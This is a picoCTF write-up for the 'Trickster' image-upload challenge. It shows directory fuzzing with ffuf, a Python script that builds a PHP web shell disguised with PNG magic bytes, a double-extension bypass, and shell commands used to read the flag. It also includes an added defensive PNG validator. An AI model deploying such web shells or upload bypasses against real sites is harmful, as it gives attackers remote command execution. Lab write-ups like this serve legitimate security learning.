Trickster

Challenge Description

I found a web app that can help process images: PNG images only!

Additional details will be available after launching your challenge instance.


Solution

First I visited the website. There was an option to upload PNG files.

First I uploaded a test image file to check the functionality. The file was successfully uploaded.

But it didn't show where the file was uploaded. So I used ffuf to enumerate directories.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://atlas.picoctf.net:53866/FUZZ

From the results of the above command, I found a directory called uploads.

Next I tried to upload a PHP file that executes commands on the target machine. I created the PHP file with the PNG magic bytes as the file signature using the following Python script.

# PHP web shell disguised as an image: the first four bytes are the
# start of the PNG signature (\x89 'P' 'N' 'G'), followed by the PHP code
with open('shell.php', 'wb') as fh:
    fh.write(b'\x89\x50\x4E\x47' + b'<? passthru($_GET["cmd"]); ?>')

After generating the PHP file, I tried to upload it. But it threw an error saying that the file name doesn't contain '.png'. So I just renamed the file to shell.png.php, tried uploading it again, and the file was uploaded successfully.
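The two checks bypassed above (a four-byte magic-number check and a "does the name contain .png" check) are the weak part of this upload handler. As an added example that is not part of the original writeup or the challenge code, here is a validator that allow-lists the final extension and parses the whole PNG structure (full 8-byte signature, IHDR first, IEND last, CRC on every chunk), so a file like shell.png.php with \x89PNG followed by PHP text is rejected; the function names and the sample files are constructed for this example.

```python
import os
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # full 8-byte signature, not just \x89PNG


def is_valid_png(data: bytes) -> bool:
    """True only if data is a structurally complete PNG: signature, IHDR first,
    IEND last, every chunk length in bounds and every chunk CRC correct."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos = len(PNG_SIGNATURE)
    chunk_types = []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if len(body) != length:          # declared length runs past the file
            return False
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) != crc:  # CRC covers type + data
            return False
        if ctype == b"IHDR" and length != 13:
            return False
        chunk_types.append(ctype)
        pos += 12 + length
        if ctype == b"IEND":
            break
    # Whole file consumed, IHDR first, IEND last: no trailing junk allowed.
    return pos == len(data) and chunk_types[:1] == [b"IHDR"] and chunk_types[-1:] == [b"IEND"]


def accept_upload(filename: str, data: bytes) -> bool:
    """Allow-list the *final* extension, then verify the content is a real PNG."""
    _, ext = os.path.splitext(filename)   # 'shell.png.php' -> '.php'
    return ext.lower() == ".png" and is_valid_png(data)


def _chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def make_minimal_png() -> bytes:
    """Constructed 1x1 RGB PNG used as a known-good upload."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte + one red pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed file shaped like the one in the writeup: 4 signature bytes, then PHP text.
FORGED = b"\x89\x50\x4E\x47" + b"<? passthru($_GET['cmd']); ?>"
```

The same parser rejects a PNG whose IDAT has been altered after the CRC was written, which is why CRC checking (rather than a magic-number prefix test) is the check worth running server-side.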

Now I tried to access the PHP file we uploaded by checking the path /uploads/shell.png.php. The website threw an error, which showed that our PHP payload worked successfully and we had got access to the target machine.

Next I tried to list the current working directory by supplying the ls command to the cmd parameter and we got the response with all the files in the current directory.

Similarly, I checked the parent directory of the uploads directory by using the command ls ../, where I found a text file.

I used the cat command to view the contents of the file and got the file.

Flag: picoCTF{c3rt!fi3d_Xp3rt_tr1ckst3r_73198bd9}
